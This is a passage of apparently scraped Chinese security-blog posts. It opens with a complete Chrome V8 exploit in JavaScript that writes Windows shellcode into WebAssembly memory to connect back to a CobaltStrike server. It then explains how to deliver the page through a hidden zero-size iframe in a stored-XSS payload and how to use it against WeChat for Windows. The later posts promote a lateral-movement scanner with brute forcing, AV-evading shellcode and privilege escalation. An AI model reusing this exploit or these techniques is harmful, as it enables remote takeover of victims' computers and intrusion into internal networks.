<script>   function gc() {       for (var i = 0; i < 0x80000; ++i) {           var a = new ArrayBuffer();      }  }   let shellcode = [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc8,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x75,0x72,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4f,0xff,0xff,0xff,0x5d,0x6a,0x00,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x00,0x41,0x56,0x49,0x89,0xe6,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x48,0x31,0xc9,0x48,0x31,0xd2,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x41,0x50,0x41,0x50,0x41,0xba,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xe9,0x93,0x00,0x00,0x00,0x5a,0x48,0x89,0xc1,0x41,0xb8,0xbb,0x01,0x00,0x00,0x4d,0x31,0xc9,0x41,0x51,0x41,0x51,0x6a,0x03,0x41,0x51,0x41,0xba,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x79,0x5b,0x48,0x89,0xc1,0x48,0x31,0xd2,0x49,0x89,0xd8,0x4d,0x31,0xc9,0x52,0x68,0x00,0x32,0xc0,0x84,0x52,0x52,0x41,0xba,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x48,0x83,0xc3,0x50,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0xba,0x1f,0x00,0x00,0x00,0x6a,0x00,0x68,0x80,0x33,0x00,0x00,0x49,0x89,0xe0,0x41,0xb9,0x04,0x00,0x00,0x00,0x41,0xba,0x75,0x46,0x9e,0x86,0xff,0xd5,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0xff,0xff,0xff,0xff,0x4d,0x31,0xc9,0x52,0x52,0x41,0xba,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x0f,0x85,0x9d,0x01,0x00,0x00,0x48,0xff,0xcf,0x0f,0x84,0x8c,0x01,0x00,0x00,0xeb,0xb3,0xe9,0xe4,0x01,0x00,0x00,0xe8,0x82,0xff,0xff,0xff,0x2f,0x59,0x39,0x58,0x73,0x00,0xe8,0x60,0x87,0xda,0xe4,0x59,0x51,0xb1,0xb9,0x07,0xcd,0xd3,0x5e,0xfb,0x13,0x18,0xa3,0xad,0xbc,0x2b,0x61,0x82,0x14,0x6e,0xb4,0x93,0x68,0xe2,0x34,0x97,0x5b,0x6e,0xec,0x4b,0x55,0xf0,0x1c,0x81,0x00,0xa6,0xce,0xac,0x72,0x9e,0xbb,0xf1,0x63,0x71,0x55,0x76,0xd2,0xce,0x43,0x0a,0xb0,0xdf,0x27,0x65,0xb7,0x9c,0xae,0x50,0x47,0x4d,0x86,0x71,0x58,0x1e,0xde,0xc2,0xf3,0xb1,0xc9,0x00,0x55,0x73,0x65,0x72,0x2d,0x41,0x67,0x65,0x6e,0x74,0x3a,0x20,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x34,0x2e,0x30,0x20,0x28,0x63,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x6c,0x65,0x3b,0x20,0x4d,0x53,0x49,0x45,0x20,0x38,0x2e,0x30,0x3b,0x20,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x35,0x2e,0x31,0x3b,0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x34,0x2e,0x30,0x29,0x0d,0x0a,0x00,0xe2,0x7f,0x5a,0x79,0x1b,0x00,0x46,0xe3,0x59,0x45,0x29,0xf4,0xbc,0x8e,0x74,0x6b,0x2e,0x3e,0x9b,0x0d,0xaf,0xa7,0x78,0xf6,0x8a,0xab,0x18,0xba,0x57,0xb0,0x64,0xc1,0x26,0x8b,0x60,0xe6,0xa4,0xdd,0x06,0x72,0xa5,0x1a,0xa5,0xd7,0x92,0x7e,0x92,0xd8,0x9d,0x15,0x68,0xb6,0x83,0x61,0x4e,0xcc,0xd6,0x69,0xb5,0xe0,0x59,0x52,0x67,0x14,0xf6,0x73,0xdb,0xe9,0x75,0xaf,0x04,0x64,0x2e,0x08,0x32,0xb7,0x6c,0xf4,0xe3,0x8f,0xa3,0x4f,0x17,0x08,0x3a,0x29,0x16,0xe4,0x1d,0x52,0x12,0xed,0xf4,0xf3,0x9a,0x8b,0xfa,0xc1,0x6f,0xab,0x3e,0xb9,0x3e,0xe2,0x34,0x73,0x96,0xa7,0xf6,0x8e,0x5f,0x6c,0xa4,0xd2,0x6a,0x70,0x33,0xdd,0xfc,0x69,0x39,0x48,0x6f,0x72,0xd2,0x22,0x5f,0x7d,0x78,0x28,0x0d,0x57,0xb3,0x28,0x2b,0xa5,0xa2,0xda,0xc1,0x23,0x2d,0x50,0x8c,0xc3,0x3e,0x81,0x03,0x3d,0x8a,0xef,0x2e,0xa7,0xea,0x33,0x21,0x56,0xb0,0x05,0x35,0xe9,0x7a,0x4d,0x72,0xa3,0xe9,0xf4,0xa7,0x32,0x02,0xd5,0xa0,0x6c,0xad,0x5d,0xf7,0x43,0x71,0x4c,0x05,0x1a,0x6e,0x75,0xf6,0xc3,0x7e,0xdc,0xda,0xed,0x5f,0x4c,0x41,0x27,0xcd,0xb2,0xbd,0xdb,0xf5,0xb9,0xa3,0x98,0x2d,0xd9,0x4b,0x5e,0x1e,0x37,0x24,0xf3,0xd1,0x08,0x5e,0xa7,0xe6,0x4d,0xc4,0x10,0xd1,0xa1,0x91,0x30,0x6d,0xc2,0x88,0xb5,0x37,0x00,0x41,0xbe,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x31,0xc9,0xba,0x00,0x00,0x40,0x00,0x41,0xb8,0x00,0x10,0x00,0x00,0x41,0xb9,0x40,0x00,0x00,0x00,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x41,0xb8,0x00,0x20,0x00,0x00,0x49,0x89,0xf9,0x41,0xba,0x12,0x96,0x89,0xe2,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb6,0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,0xd7,0x58,0x58,0x58,0x48,0x05,0x00,0x00,0x00,0x00,0x50,0xc3,0xe8,0x7f,0xfd,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x38,0x34,0x2e,0x32,0x34,0x33,0x00,0x12,0x34,0x56,0x78];   var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);   var wasmModule = new WebAssembly.Module(wasmCode);   var wasmInstance = new WebAssembly.Instance(wasmModule);   var main = wasmInstance.exports.main;   var bf = new ArrayBuffer(8);   var bfView = new DataView(bf);   function fLow(f) {       bfView.setFloat64(0, f, true);       return (bfView.getUint32(0, true));  }   function fHi(f) {       bfView.setFloat64(0, f, true);       return (bfView.getUint32(4, true))  }   function i2f(low, hi) {       bfView.setUint32(0, low, true);       bfView.setUint32(4, hi, true);       return bfView.getFloat64(0, true);  }   function f2big(f) {       bfView.setFloat64(0, f, true);       return bfView.getBigUint64(0, true);  }   function big2f(b) {       bfView.setBigUint64(0, b, true);       return bfView.getFloat64(0, true);  }   class LeakArrayBuffer extends ArrayBuffer {       constructor(size) {           super(size);           this.slot = 0xb33f;      }  }   function foo(a) {       let x = -1;       if (a) x = 0xFFFFFFFF;       var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));       arr.shift();       let local_arr = Array(2);       local_arr[0] = 5.1;//4014666666666666       let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8       arr[0] = 0x1122;       return [arr, local_arr, buff];  }   for (var i = 0; i < 0x10000; ++i)       foo(false);   gc(); gc();  [corrput_arr, rwarr, corrupt_buff] = foo(true);   corrput_arr[12] = 0x22444;   delete corrput_arr;   function setbackingStore(hi, low) {       rwarr[4] = i2f(fLow(rwarr[4]), hi);       rwarr[5] = i2f(low, fHi(rwarr[5]));  }   function leakObjLow(o) {       corrupt_buff.slot = o;       return (fLow(rwarr[9]) - 1);  }   let corrupt_view = new DataView(corrupt_buff);   let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);   let idx0Addr = corrupt_buffer_ptr_low - 0x10;   let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;   let delta = baseAddr + 0x1c - idx0Addr;   if ((delta % 8) == 0) {       let baseIdx = delta / 8;       this.base = fLow(rwarr[baseIdx]);  } else {       let baseIdx = ((delta - (delta % 8)) / 8);       this.base = fHi(rwarr[baseIdx]);  }   let wasmInsAddr = leakObjLow(wasmInstance);   setbackingStore(wasmInsAddr, this.base);   let code_entry = corrupt_view.getFloat64(13 * 8, true);   setbackingStore(fLow(code_entry), fHi(code_entry));   for (let i = 0; i < shellcode.length; i++) {       corrupt_view.setUint8(i, shellcode[i]);  }   main();</script>

随后保存为 exp.html ,让目标打开:

这个时候目标成功上线到 CobaltStrike:


XSS+Chrome Rce = 上线到CobaltStrike


    假设有一个网站存在存储XSS漏洞,可以插入这段 Payload 并加载一个远程 html 页面,若目标机器关闭了沙盒并且使用的是 Chrome 浏览器,就可导致访问此页面的人上线到 CobaltStrike。

    同时,在内网场景也可使用ARP来进行大规模PC权限的获取。

    具体使用到的标签是:

<iframe src="http://192.168.84.248/exp.html" width="0" height="0">

我把宽度和高度都设置为 0 ,这样目标就无法看到 exp.html 页面了!

演示代码:

其中 http://192.168.84.248/exp.html 是攻击者构造好的恶意页面,当我们访问到了被插入 XSS Payload 的页面,就会自动加载 exp.html 成功上线到 CobaltStrike:


思路大家可自由延伸。


Windows版微信加载JS运行Shellcode


通过微信点击URL链接,过程中会调用微信内置浏览器(chrome内核,并开启了--no-sandbox参数)。针对chrome漏洞利用的js代码成功执行后,shellcode将启动远控进程,最终获取该PC当前用户权限。


Chrome安全问题可能导致Windows版微信任意代码执行漏洞

组件: Windows版微信

漏洞类型: 远程代码执行

影响: PC接管

简述: 攻击者可以通过微信发送一个特制的web链接,用户一旦点击链接,Windows版微信便会加载执行攻击者构造恶意代码,最终使攻击者控制用户PC。

 Tencnet:Windows版微信: 小于等于3.2.1.141版本修复建议

通用修补建议

目前微信已经修复漏洞并发布了更新版本,建议用户立即将Windows版微信更新到3.2.1.141以上的最新版本

InBug-实验室


官网:https://www.inbug.org/

InScan内网扫描器:https://github.com/inbug-team/InScan

阅读原文

跳转微信打开

]]> Sat, 17 Apr 2021 12:32:00 +0800 InScan 内网自动化横向渗透工具使用教程 https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247483720&idx=1&sn=92715eecb0c6a7c6133f832e0328ece2 InScan 内网自动化横向渗透工具使用教程 原创 InBug实验室 2021-04-16 09:25

InScan 内网自动化横向渗透工具使用教程

前言


本工具只可用于安全性测试,勿用于非法用途!


后台收到私信发现很多人都还不太会使用 InScan 这款工具,对于这款工具还有很多的疑问,本篇文章介绍一下 InScan 这款工具的使用方法。


如何获取 InScan 工具


获取 InScan 有两种渠道:InBug实验室官网:https://www.inbug.org/ 
(自定义生成)
第二种就是去Github下载:https://github.com/inbug-team/InScan/releases
(获取本地网卡扫描,无法自定义)
大家根据自己电脑系统选择相应的文件。


 InScan 工具的使用教程

首先去InBug实验室官网注册一个账号:
https://www.inbug.org/register
之后登陆到个人中心生成一个 InScan Agent 任务,根据大家的需求设置目标网段、扫描端口、爆破的协议、以及线程大小:

如果需要自定义爆破字典的话,就勾选“弱口令生成器”:

最后添加已有的 POC 就可以横向扫描了:

程序启动后,访问本地
http://127.0.0.1:8080/   即可看到扫描结果:
如果渗透的是内网环境,自行转发端口到互联网查看结果,同时也可把db文件复制到本地进行扫描结果的查看。

如本地安装有Chrome,扫描到WEB服务自动会截图返回到后台:

内网资产:

InScan 还会自动识别目标主机网卡信息:

高危系统漏洞:

高危 Web 漏洞:

弱口令爆破成功的结果:

 InScan 工具的使用视频

生成可执行程序

InScan运行过程

提交反馈

如有好的建议,以及发现BUG。
GitHub issue: https://github.com/inbug-team/InScan/issues

官网(生成扫描器): https://www.inbug.org


也可添加微信号:whoami_in    邀请进群。


同时也可通过公众号联系:


阅读原文

跳转微信打开

]]> Fri, 16 Apr 2021 09:25:00 +0800 一款内网自动化横向工具:InScan开源扫描器 https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247483680&idx=1&sn=a48423a8d43bb9e948f6b40a855c812f 一款内网自动化横向工具:InScan开源扫描器 InBug实验室 2021-04-12 10:00

一款内网自动化横向工具:InScan开源扫描器

InScan-开源扫描器


工具简介

本工具只可用于安全性测试,勿用于非法用途!


工具定位

边界打点后的自动化内网工具,完全与服务端脱离。服务端只用于生成poc,网段信息等配置。

内网渗透痛点

目前已有的扫描器,依赖库较多,体积过于庞大,在内网渗透中,很多极端情况无法安装扫描器,使用socks4/socks5代理扫描的话,时间久,效率低。

InScan优点

  • 多平台,单一的二进制文件,免依赖;

  • 支持自动可视化多级隧道,通过后台按钮开关即可穿越多层网络;

  • 支持ipv6的扫描器;

  • 快速直观查看多网卡机器,方便快速定位能穿多层网络机器;

  • 通过已知密码生成社工字典,快速横向内网;

  • 内网B/S架构系统自动化爆破,验证码自动识别;

  • 快速资产识别,站点截图;

  • 通过扫描到的资产自动化进行网站目录扫描;

InScan支持平台

全平台支持,一个二进制文件,开箱即用。命令行启动

  -pocPort int        rpc端口,默认:8009 (default 8009)  -rpcPort int        rpc端口,默认:8008 (default 8008)  -sysTime int        系统信息上报时间,默认:15秒 (default 15)  -webPort int        web端口,默认:8080 (default 8080)

Windows使用

推荐管理员权限打开cmd,在cmd界面执行inscan.exe(管理员权限可支持icmp快速探测存活)

Linux使用

赋予文件执行权限

chmod +x inscan
后台执行
./inscan &

Android近源攻击

破解WiFi密码,手机安装Termux.apk,打开终端。(不要勾选icmp探测存活)

wget 后台生成的arm架构程序

赋予文件执行权限

chmod +x inscan

后台执行

./inscan &

Termux切后台,使用手机浏览器访问 即可开始扫描。

横向移动生成器

填写ip地址段或者与域名,开启自动化目录扫描、爆破、字典生成等功能。
ip地址逗号分隔或换行分隔
示例:

192.168.1.1/16,172.16.0.0/8

192.168.1.1/16172.16.0.0/8
弱口令字典生成

poc选择

精准的扫描方式

InScan首先做端口扫描,然后把状态为打开的TCP或UDP的IP+端口传递给服务识别模块,这些IP+端口会并行做服务探测。一旦连接建立成功,InScan会尝试超时等待,一些常见的服务,例如FTP、SSH、SMTP、Telnet、POP3、IMAP服务会对建立的连接发送一些欢迎的banner信息,这个过程没有发送任何的数据(也就是只经过了TCP的三次握手),在等待的时间内如果收到了数据,InScan会将收到的banner信息和空探针的上千个指纹库进行匹配,假如服务和版本信息完全识别了,那么这个端口的服务识别就结束了。假如InScan探测到的端口为存活,但是没有获得banner数据,那么InScan会根据对应端口和优先级动态调整数据探针指纹策略继续进行扫描,直到完全识别到服务和版本。

扫描结果

多网卡流量监控

操作系统详情

网卡、cpu、内存详情

可视化扫描进度

banner详情 

banner详情

可视化网卡识别,精准定位多网卡机器。

poc漏洞验证

web管理ssh

爆破成功后的ssh通过网页操作。
开发中,近期上线............

rdp管理

爆破成功后的rdp,通过网页操作。
开发中,近期上线............

数据库管理

web界面实现数据库的增删改查功能,以及打包下载。
开发中,近期上线............

web目录扫描

开发中,近期上线............

web登陆框自动爆破

机器学习的验证码识别库,自动爆破内网可登陆的web系统。
开发中,近期上线............

poc管理

提交格式

目前支持xray、nuclei等模板,后续支持更多。

cms指纹管理

操作系统指纹、CMS指纹等。

可视化隧道节点管理

使用隧道功能后,poc获取控制权限或爆破成功,自动化传输隧道agent,通过后台开关即可控制节点。

DNSLOG

直接生成域名即可。

shellcode自动化免杀

  1. 采用国密算法加密的shellcode,可过大部分杀软,满足后渗透的需求。

  2. 如编译好的exe文件,也可以使用该功能进行混淆捆版。

提权辅助

windows自动采集补丁信息,如当前非管理员权限,可自动化进行简单提权,同时也会列出可提权exp,进行手工提权。同时也可粘贴其他地方的systeminfo进行提权查询。

提交反馈

如有好的建议,以及发现BUG。
GitHub issue: https://github.com/inbug-team/InScan/issues

官网(生成扫描器): https://www.inbug.org

同时也可通过公众号联系:


阅读原文

跳转微信打开

]]> Mon, 12 Apr 2021 10:00:00 +0800